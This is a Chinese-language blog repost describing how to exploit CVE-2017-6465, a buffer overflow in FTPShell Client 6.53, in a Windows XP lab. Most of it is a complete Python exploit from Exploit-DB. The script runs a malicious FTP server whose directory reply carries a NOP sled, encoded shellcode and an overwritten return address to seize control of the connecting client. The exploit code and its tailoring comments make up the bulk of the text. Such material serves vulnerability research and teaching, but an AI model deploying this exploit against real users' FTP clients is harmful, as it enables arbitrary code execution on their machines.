CVE-2017-6465 FTPShell Client 6.53之缓冲区溢出利用

Posted 2020-09-02

tags:

篇首语：本文由小常识网(cha138.com)小编为大家整理，主要介绍了CVE-2017-6465 FTPShell Client 6.53之缓冲区溢出利用相关的知识，希望对你有一定的参考价值。

0x00.前言

　　FTPShell是一款国外Windows平台下比较流行的FTP服务工具，截至本文客户端最新版6.53下载地址:http://www.ftpshell.com/downloadclient.htm#

　　实验环境：VMWare + WinXP SP3 EN

　　Vulnerable App 获取地址：http://www.ftpshell.com/downloadclient.htm#

0x01.利用

　　该缓冲区溢出漏洞发生在客户端与FTP服务端初始化认证连接阶段，首先实验环境下安装好 FTPShell Client 6.53

技术分享

　　这里我们直接使用Explit-DB提供的python代码搭建一台恶意FTP服务器

 1 # Exploit Title: FTPShell Client 6.53 buffer overflow on making initial connection
 2 # Date: 2017-03-04
 3 # Exploit Author: Peter Baris
 4 # Vendor Homepage: http://www.saptech-erp.com.au
 5 # Software Link: http://www.ftpshell.com/downloadclient.htm
 6 # Version: Windows Server 2008 R2 x64
 7 # Tested on: Windows Server 2008 R2 Standard x64
 8 # CVE: CVE-2017-6465
 9 # 2017-03-04: Software vendor notified
10 # 2017-03-06: No reply
11 # 2017-03-06: Publishing
12 
13 import socket
14 import sys
15  
16 shell=("\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49"
17 "\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36"
18 "\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34"
19 "\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41"
20 "\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x44"
21 "\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x38\\x45\\x54\\x4e\\x33\\x4b\\x58\\x4e\\x37"
22 "\\x45\\x50\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x38\\x4f\\x44\\x4a\\x41\\x4b\\x48"
23 "\\x4f\\x35\\x42\\x32\\x41\\x50\\x4b\\x4e\\x49\\x34\\x4b\\x38\\x46\\x43\\x4b\\x48"
24 "\\x41\\x30\\x50\\x4e\\x41\\x43\\x42\\x4c\\x49\\x39\\x4e\\x4a\\x46\\x48\\x42\\x4c"
25 "\\x46\\x37\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x30\\x44\\x4c\\x4b\\x4e"
26 "\\x46\\x4f\\x4b\\x43\\x46\\x35\\x46\\x42\\x46\\x30\\x45\\x47\\x45\\x4e\\x4b\\x48"
27 "\\x4f\\x35\\x46\\x42\\x41\\x50\\x4b\\x4e\\x48\\x46\\x4b\\x58\\x4e\\x30\\x4b\\x54"
28 "\\x4b\\x58\\x4f\\x55\\x4e\\x31\\x41\\x50\\x4b\\x4e\\x4b\\x58\\x4e\\x31\\x4b\\x48"
29 "\\x41\\x30\\x4b\\x4e\\x49\\x38\\x4e\\x45\\x46\\x52\\x46\\x30\\x43\\x4c\\x41\\x43"
30 "\\x42\\x4c\\x46\\x46\\x4b\\x48\\x42\\x54\\x42\\x53\\x45\\x38\\x42\\x4c\\x4a\\x57"
31 "\\x4e\\x30\\x4b\\x48\\x42\\x54\\x4e\\x30\\x4b\\x48\\x42\\x37\\x4e\\x51\\x4d\\x4a"
32 "\\x4b\\x58\\x4a\\x56\\x4a\\x50\\x4b\\x4e\\x49\\x30\\x4b\\x38\\x42\\x38\\x42\\x4b"
33 "\\x42\\x50\\x42\\x30\\x42\\x50\\x4b\\x58\\x4a\\x46\\x4e\\x43\\x4f\\x35\\x41\\x53"
34 "\\x48\\x4f\\x42\\x56\\x48\\x45\\x49\\x38\\x4a\\x4f\\x43\\x48\\x42\\x4c\\x4b\\x37"
35 "\\x42\\x35\\x4a\\x46\\x42\\x4f\\x4c\\x48\\x46\\x50\\x4f\\x45\\x4a\\x46\\x4a\\x49"
36 "\\x50\\x4f\\x4c\\x58\\x50\\x30\\x47\\x45\\x4f\\x4f\\x47\\x4e\\x43\\x36\\x41\\x46"
37 "\\x4e\\x36\\x43\\x46\\x42\\x50\\x5a")    #这里替换成弹出calc.exe的shellcode
38  
39 port = 21
40  
41 try:
42         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
43         s.bind(("0.0.0.0", port))　　#绑定本地21端口
44         s.listen(5)　　　　　　　　　　#开启FTP服务监听
45         print("[i] FTP server started on port: "+str(port)+"\\r\\n")
46 except:
47         print("[!] Failed to bind the server to port: "+str(port)+"\\r\\n")
48  
49  
50 # 004b95dc in ftpshell.exe PUSH ESI ; RETN
51 eip = "\\xdc\\x95\\x4b"　　#该地址在WinXP SP3 EN中仍可使用
52 nops = "\\x90"*8
53 junk = "A"*(400-len(nops)-len(shell))
54 buffer = nops + shell + junk + eip　　#构造出恶意Buffer结构
55  
56 while True:
57     conn, addr = s.accept()
58     conn.send(‘220 Welcome to your unfriendly FTP server\\r\\n‘)
59     print(conn.recv(1024))
60     conn.send("331 OK\\r\\n")
61     print(conn.recv(1024))
62     conn.send(‘230 OK\\r\\n‘)
63     print(conn.recv(1024))
64     conn.send(‘220 "‘+buffer+‘" is current directory\\r\\n‘)　　#发送恶意Buffer结构